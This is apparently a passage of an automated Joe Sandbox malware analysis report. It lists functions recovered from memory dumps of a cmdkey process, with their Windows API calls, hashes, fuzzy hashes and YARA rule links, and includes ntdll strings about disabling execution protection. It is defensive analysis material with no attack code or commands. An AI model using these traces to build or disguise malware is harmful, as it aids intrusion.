                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                                                                                                                                • Opcode ID: b7104b9d747e935088b0e9e47ecac50d0ec8158323838ae5b056e42438e9ff63
                                                                                                                                                                                                                                                                • Instruction ID: 13963ae4dc5722ca8cc935143e569a805e02d42bc531709ae09a80e80b29072d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b7104b9d747e935088b0e9e47ecac50d0ec8158323838ae5b056e42438e9ff63
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 12E0ED7668171436E220B6D99C12FD7A69C8B85B60F540415F71CAF1C0DA95F94183E5
                                                                                                                                                                                                                                                                Function 03028450 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlDosPathNameToNtPathName_U.NTDLL(?,?,?,?), ref: 03028490
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Path$NameName_
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3514427675-0
                                                                                                                                                                                                                                                                • Opcode ID: 11977639619bfbe7913a88e5d84c3e1f315cb3a1adaf0ed0a683be7863265b8f
                                                                                                                                                                                                                                                                • Instruction ID: 3a2ea222d545c6bb5274d303a95f2104c62041799043cc7d6dba1b252430e176
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 11977639619bfbe7913a88e5d84c3e1f315cb3a1adaf0ed0a683be7863265b8f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5AF039BA2002187BDA14EE59DC41EDB77ADEFC8750F008008FA08A7240D670BD118BF4
                                                                                                                                                                                                                                                                Function 0301469C Relevance: 1.5, APIs: 1, Instructions: 30libraryloaderCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 03014692
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Load
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                • Opcode ID: 8ae6c87d1062e41b2745643221b85222a707d48f99fe44d78231358a06c4703a
                                                                                                                                                                                                                                                                • Instruction ID: 08bc0175b48a618d86b29bd6704a56b73ff87d3f9640b62af6524db94be6d0dc
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ae6c87d1062e41b2745643221b85222a707d48f99fe44d78231358a06c4703a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8FE0927195500ABFCF10DA98CC85FDEFF7CEB45308F004284F50857241D6709524CB91
                                                                                                                                                                                                                                                                Function 03029820 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(03011AE6,?,0302580B,03011AE6,030257FF,0302580B,?,03011AE6,030257FF,00001000,?,?,00000000), ref: 0302985F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                • Opcode ID: ce236884e88abd1da2592d56879c599d7ce0433b3b18ba482d0d97a493f3fac7
                                                                                                                                                                                                                                                                • Instruction ID: 72da22630d7c8a5757c9131335232bd88a299474136a417f056b7c8dc484e2f1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce236884e88abd1da2592d56879c599d7ce0433b3b18ba482d0d97a493f3fac7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CAE0657A2447047BDA14EE59DC41FEB77ACEFC9B10F004019FA08AB241CA70B8118BB9
                                                                                                                                                                                                                                                                Function 03029870 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,FFFFFEB8,00000007,00000000,00000004,00000000,03013EA1,000000F4), ref: 030298AC
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                • Opcode ID: 3c882aa763a3663f21b403435092974dd4be2cf2061f2f14c9468e1c5220bb38
                                                                                                                                                                                                                                                                • Instruction ID: ca4a8a968c3e562fe14275d5119651c9a8729421308e8f065bf2674ef0dde576
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c882aa763a3663f21b403435092974dd4be2cf2061f2f14c9468e1c5220bb38
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60E06DB92043047BD614EE59DC40FDB77ADEFC8710F004009FA0CA7240D670B8108BB8
                                                                                                                                                                                                                                                                Function 03018490 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 030184BC
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                • Opcode ID: 871c372c7ae1feb390ebb27b33e961cf2a9dd6bb9c5dce25a950b7cfe838ed74
                                                                                                                                                                                                                                                                • Instruction ID: a44b26576feb8461b8af3b18f6979302130490ede10a485ebddad7762015a392
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 871c372c7ae1feb390ebb27b33e961cf2a9dd6bb9c5dce25a950b7cfe838ed74
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1CE0263520230827EB34EAB8DC45FA2338C9B48624F4C8A60B81CCBAC1EB78F6114250
                                                                                                                                                                                                                                                                Function 03018279 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,03011DE0,0302813F,030257FF,03011DB0), ref: 030182B3
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorMode
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                • Opcode ID: 1c51c684850431a069ffd445f7a28472659894cf882d2377ae12a43170b80214
                                                                                                                                                                                                                                                                • Instruction ID: 39b97f98ab214aa18ce3ac110bfd8e664741b1ec3914730718550dd92aabebab
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c51c684850431a069ffd445f7a28472659894cf882d2377ae12a43170b80214
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 78E0C2396413047BE604E2E4DC06F6172CCA784254F444468FD08EB2C2E965A1204664
                                                                                                                                                                                                                                                                Function 03018280 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,03011DE0,0302813F,030257FF,03011DB0), ref: 030182B3
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21523658411.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3000000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorMode
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                • Opcode ID: b97caff731ece5b53e966376f1e7369313b1e167bf3e2af49fcd98b7f487ee8d
                                                                                                                                                                                                                                                                • Instruction ID: 038f465c39ee70073ac2834d93bf8a3695b2c8bb7029d0f54e7b21592af3db73
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b97caff731ece5b53e966376f1e7369313b1e167bf3e2af49fcd98b7f487ee8d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13D05E796413047BF604F6E4DC06FA672CCAB44654F484464F908EB3C2E965F15046A5
                                                                                                                                                                                                                                                                Function 038F2B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: 3e984a44776e951f8274f56ecbfe3c00ce23efb0626755a85a6c7d0721b17b9b
                                                                                                                                                                                                                                                                • Instruction ID: 0df53db8f8e2104931b04f3dc41fcea9be4ddeda75413b330a7970b507f2394b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e984a44776e951f8274f56ecbfe3c00ce23efb0626755a85a6c7d0721b17b9b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87B09B719055C5CDDA11D76047087177954A7D0701F15C495D6564645E8738C491F275

                                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                                Function 036804E8 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21525817867.0000000003680000.00000040.00000800.00020000.00000000.sdmp, Offset: 03680000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3680000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 29773d1ec2d366f37901bd5a8c5991720ffca7f7bbdbb70eebe77c7f0a70ee1c
                                                                                                                                                                                                                                                                • Instruction ID: 081428474a72d80c513fdb6a530d7d6e058653424a0cf24965e6a7edca54aff2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 29773d1ec2d366f37901bd5a8c5991720ffca7f7bbdbb70eebe77c7f0a70ee1c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6D41E370A1DB095FD368FF689081676B2E5FB8D300F100A2DD88AC3352EA70E8468789
                                                                                                                                                                                                                                                                Function 0368E020 Relevance: 57.7, Strings: 46, Instructions: 211COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21525817867.0000000003680000.00000040.00000800.00020000.00000000.sdmp, Offset: 03680000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3680000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                                                                                                                                                                • API String ID: 0-3754132690
                                                                                                                                                                                                                                                                • Opcode ID: fdc7e8973fa29a8e9ded732f7d65128a49cab7f9a4b461baca6ac5a47474afa8
                                                                                                                                                                                                                                                                • Instruction ID: d0d9e37900135b78806ec416c9d31d79a060e645120aaf2330a6e298879dbaf0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fdc7e8973fa29a8e9ded732f7d65128a49cab7f9a4b461baca6ac5a47474afa8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E3915FF04483948AC7158F54A1612AFFFB1EBC6305F15816DE7E6BB243C3BE89058B85
                                                                                                                                                                                                                                                                Function 038E7550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 03924592
                                                                                                                                                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0392454D
                                                                                                                                                                                                                                                                • ExecuteOptions, xrefs: 039244AB
                                                                                                                                                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03924507
                                                                                                                                                                                                                                                                • Execute=1, xrefs: 0392451E
                                                                                                                                                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03924460
                                                                                                                                                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03924530
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                                                                                • API String ID: 0-484625025
                                                                                                                                                                                                                                                                • Opcode ID: fc0b4b3f5661f07301092a52774383dc6aab3f849877293a41611fae4d3ab1a6
                                                                                                                                                                                                                                                                • Instruction ID: 02043444efc70878aebda593d832dbcc89fcdf1315412418852361968b0620a5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc0b4b3f5661f07301092a52774383dc6aab3f849877293a41611fae4d3ab1a6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA510735A003197EEF10EBD9EC89FAD77A8EF49304F0805E9E515EB281EB709A45CB51
                                                                                                                                                                                                                                                                Function 038B9046 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 199COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000005.00000002.21526015980.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000005.00000002.21526015980.00000000039AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_3880000_cmdkey.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: $$@$@wv
                                                                                                                                                                                                                                                                • API String ID: 0-2230787357
                                                                                                                                                                                                                                                                • Opcode ID: 4300f03d21195fd8b8105c9f8498c38029f41a0a0e131e08eb51007c964e1f24
                                                                                                                                                                                                                                                                • Instruction ID: 412c456b4aceec41c8ed98c54a39e747d680a061b632465a27a55aa8b1388953
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4300f03d21195fd8b8105c9f8498c38029f41a0a0e131e08eb51007c964e1f24
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C813A71D002699BDB25DB94CC44BEEB7B8AF08750F0445EAEA09F7280D7309E85DFA1